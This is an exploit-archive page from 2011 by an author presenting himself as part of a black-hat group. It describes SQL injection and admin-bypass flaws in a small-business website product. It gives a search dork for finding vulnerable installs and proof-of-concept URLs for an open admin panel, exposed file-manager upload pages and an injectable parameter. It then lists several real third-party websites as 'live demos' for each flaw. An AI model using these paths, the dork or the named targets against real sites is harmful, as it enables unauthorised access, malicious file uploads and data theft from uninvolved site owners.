Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass: Posted May 22, 2011; Authored by Net.Edit0r; Mathew Callingham Associates version 3.x.x suffers from administrative bypass and SQL injection vulnerabilities.; tags | exploit, vulnerability, sql injection, bypass; SHA-256 | 3f99b5a8b3d22db59e6b1cf8632f35237f3fc0f2936164d80e3e287d8f1c4d42; Download | Favorite | View

Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

=========================================================================
Mathew Callingham Associatess 3.x.x Multiple Vulnerability
==========================================================================

[+]Title :.......Mathew Callingham Associatess 3.x.x Multiple Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Linux/PHP
---------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group #BHG
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org
[~] Vendor: http://designer-website.com/
[~] Category: Web Apps

==========ExPl0iT3d by Net.Edit0r==========

[+] DORK: "Designed by Mathew Callingham Associates"


[ I ].   Multiple Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+++] Important: The security problem in the directory "admin" has been created.


[P0C]:  http://127.0.0.1/admin/editor/filemanager/upload/test.html

[P0C]:  http://127.0.0.1/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

[P0C]:  http://127.0.0.1/admin/ Admin PaneL Edite Page !

[P0C]:  http://127.0.0.1/viewclassified.php?classified=[SQL]

[L!v3 D3m0's]:

http://www.stockton-dancing.co.uk/admin/ <> 1

http://www.1pricepcrepairs.com/admin/ <> 1

http://platinumbuilders.co.uk/admin/editor/filemanager/upload/test.html <> 2

http://www.holbro.net/admin/editor/filemanager/upload/test.html <> 2

http://www.carpfishingtips.co.uk/viewclassified.php?classified=15 [SQL] <> 3

http://www.dcs-paving.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
<> 4

http://www.stockton-dancing.co.uk/admin/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
<> 4

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[+] TIME TABLE:

20 May 2011 - Vulnerability discovered.
21  May 2011  - Advisory released.


===========================================================================================
[!] Black Hat Group ./Iranian HackerZ
===========================================================================================
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
===========================================================================================
[!] Greetz To : DarkCoder | Amir-MaGiC | 3H34N | H3x | D3adlY & All
Iranian HackerZ
===========================================================================================
[!] Spec Th4nks: HUrr!c4nE | B3hz4d | M4Hd1 | Cho0bin And All My Friendz
===========================================================================================
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
===========================================================================================

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

Share This

Mathew Callingham Associates 3.x.x SQL Injection / Authentication Bypass

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems